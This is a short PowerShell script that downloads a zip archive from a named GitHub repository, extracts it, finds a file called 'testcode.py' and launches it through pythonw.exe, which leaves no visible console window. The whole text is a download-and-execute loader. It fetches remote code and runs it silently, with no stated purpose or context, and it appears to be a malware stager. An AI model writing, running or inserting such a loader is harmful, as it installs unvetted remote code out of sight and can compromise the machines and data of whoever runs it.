
$url = "https://github.com/robotinsideus12/cl/raw/refs/heads/main/python3.zip"

$zipFile = "python3.zip"

$extractPath = "extracted"


Invoke-WebRequest -Uri $url -OutFile $zipFile


Expand-Archive -Path $zipFile -DestinationPath $extractPath -Force


$scriptPath = Get-ChildItem -Path $extractPath -Filter "testcode.py" -Recurse | Select-Object -First 1

if ($scriptPath) {

    Set-Location -Path $scriptPath.DirectoryName

    Start-Process "pythonw.exe" -ArgumentList "testcode.py"
} else {
    Write-Host "File testcode.py not found in the archive."
}
